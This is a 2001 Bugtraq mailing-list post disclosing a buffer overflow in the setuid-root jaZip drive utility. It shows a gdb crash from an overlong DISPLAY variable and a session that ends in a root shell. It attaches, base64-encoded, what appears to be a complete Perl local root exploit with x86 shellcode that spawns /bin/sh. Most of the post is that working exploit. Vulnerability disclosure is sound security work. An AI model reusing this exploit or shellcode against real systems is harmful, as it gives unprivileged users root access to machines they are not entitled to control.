Date: Sun, 14 Jan 2001 17:05:48 +0000 From: teleh0r <teleh0r@DOGLOVER.COM> Subject: Vulnerability in jaZip. To: BUGTRAQ@SECURITYFOCUS.COM --------------Boundary-00=_OTW5OLAYS3R76NBXB0LW Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Dear, Bugtraq. jaZip is a program for managing an Iomega Zip or Jaz drive. It is often installed setuid root - and because of a buffer overflow it is possible for regular users to become root. Please excuse me if this was know. Please note that I can not guarantee that this information is correct. Tested rpm: ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/ RPMS/jaZip-0.32-2.i386.rpm [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'` [root@localhost /root]# gdb /usr/X11R6/bin/jazip GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. (gdb) r Starting program: /usr/X11R6/bin/jazip Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () ---- [teleh0r@localhost teleh0r]$ rpm -q jaZip jaZip-0.32-2 [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl Address: 0xbffff7ac bash# Exploit attached. Sincerely yours, teleh0r -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard --------------Boundary-00=_OTW5OLAYS3R76NBXB0LW Content-Type: application/x-perl; name="jazip-exploit.pl" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="jazip-exploit.pl" IyEvdXNyL2Jpbi9wZXJsCgojIyBqYVppcCBFeHBsb2l0IC8gVGVzdGVkIHZlcnNpb246IGphWmlw LTAuMzItMiAvIGFubm8gMjAwMAojIyB0ZWxlaDByQGRvZ2xvdmVyLmNvbSAvIGh0dHA6Ly90ZWxl aDByLmNqYi5uZXQvCgokc2hlbGxjb2RlID0gICAgICAgICAgICAgICAgICAgICAjIFNoZWxsY29k ZSBieTogVGFlaG8gT2gKICAgICJceGViXHgxZiIuICAgICAgICAgICAgICAgICAgIy8qIGptcCAw eDFmICAgICAgICAgICAgICAqLwogICAgIlx4NWUiLiAgICAgICAgICAgICAgICAgICAgICAjLyog cG9wbCAlZXNpICAgICAgICAgICAgICovCiAgICAiXHg4OVx4NzZceDA4Ii4gICAgICAgICAgICAg ICMvKiBtb3ZsICVlc2ksMHg4KCVlc2kpICAgKi8KICAgICJceDMxXHhjMCIuICAgICAgICAgICAg ICAgICAgIy8qIHhvcmwgJWVheCwlZWF4ICAgICAgICAqLwogICAgIlx4ODhceDQ2XHgwNyIuICAg ICAgICAgICAgICAjLyogbW92YiAlZWF4LDB4NyglZXNpKSAgICovCiAgICAiXHg4OVx4NDZceDBj Ii4gICAgICAgICAgICAgICMvKiBtb3ZsICVlYXgsMHhjKCVlc2kpICAgKi8KICAgICJceGIwXHgw YiIuICAgICAgICAgICAgICAgICAgIy8qIG1vdmIgJDB4YiwlYWwgICAgICAgICAqLwogICAgIlx4 ODlceGYzIi4gICAgICAgICAgICAgICAgICAjLyogbW92bCAlZXNpLCVlYnggICAgICAgICovCiAg ICAiXHg4ZFx4NGVceDA4Ii4gICAgICAgICAgICAgICMvKiBsZWFsIDB4OCglZXNpKSwlZWN4ICAg Ki8KICAgICJceDhkXHg1Nlx4MGMiLiAgICAgICAgICAgICAgIy8qIGxlYWwgMHhjKCVlc2kpLCVl ZHggICAqLwogICAgIlx4Y2RceDgwIi4gICAgICAgICAgICAgICAgICAjLyogaW50ICQweDgwICAg ICAgICAgICAgICovCiAgICAiXHgzMVx4ZGIiLiAgICAgICAgICAgICAgICAgICMvKiB4b3JsICVl YngsJWVieCAgICAgICAgKi8KICAgICJceDg5XHhkOCIuICAgICAgICAgICAgICAgICAgIy8qIG1v dmwgJWVieCwlZWF4ICAgICAgICAqLwogICAgIlx4NDAiLiAgICAgICAgICAgICAgICAgICAgICAj LyogaW5jICVlYXggICAgICAgICAgICAgICovCiAgICAiXHhjZFx4ODAiLiAgICAgICAgICAgICAg ICAgICMvKiBpbnQgJDB4ODAgICAgICAgICAgICAgKi8KICAgICJceGU4XHhkY1x4ZmZceGZmXHhm ZiIuICAgICAgIy8qIGNhbGwgLTB4MjQgICAgICAgICAgICAqLwogICAgIi9iaW4vc2giOyAgICAg ICAgICAgICAgICAgICAjLyogLnN0cmluZyBcIi9iaW4vc2hcIiAgICovCgoKJHJldCA9IDB4YmZm ZmY3YWM7ICAjIE1heSBoYXZlIHRvIGJlIG1vZGlmaWVkLgokbGVuID0gMjEwMDsKJG5vcCA9ICdB JzsKCmlmIChAQVJHViA9PSAxKSB7CiAgICAkb2Zmc2V0ID0gJEFSR1ZbMF07Cn0KCmZvciAoJGkg PSAwOyAkaSA8ICgkbGVuIC0gbGVuZ3RoKCRzaGVsbGNvZGUpIC0gMTAwKTsgJGkrKykgewogICAg JGJ1ZmZlciAuPSAkbm9wOwp9CgokYnVmZmVyIC49ICRzaGVsbGNvZGU7CgpwcmludCgiQWRkcmVz czogMHgiLCBzcHJpbnRmKCclbHgnLCgkcmV0ICsgJG9mZnNldCkpLCAiXG4iKTsKJG5ld19yZXQg PSBwYWNrKCdsJywoJHJldCArICRvZmZzZXQpKTsKJGJ1ZmZlciAuPSAkbm9wIHggMzsgIyBNYXkg aGF2ZSB0byBiZSBtb2RpZmllZC4KCmZvciAoJGkgKz0gbGVuZ3RoKCRzaGVsbGNvZGUpOyAkaSA8 ICRsZW47ICRpICs9IDQpIHsKICAgICRidWZmZXIgLj0gJG5ld19yZXQ7Cn0KCmlmICgkRU5WeydE SVNQTEFZJ30pIHsKICAgIGRlbGV0ZSgkRU5WeydESVNQTEFZJ30pOwp9Cgpsb2NhbCgkRU5WeydE SVNQTEFZJ30pID0gJGJ1ZmZlcjsKZXhlYygiL3Vzci9YMTFSNi9iaW4vamF6aXAiKTsK --------------Boundary-00=_OTW5OLAYS3R76NBXB0LW--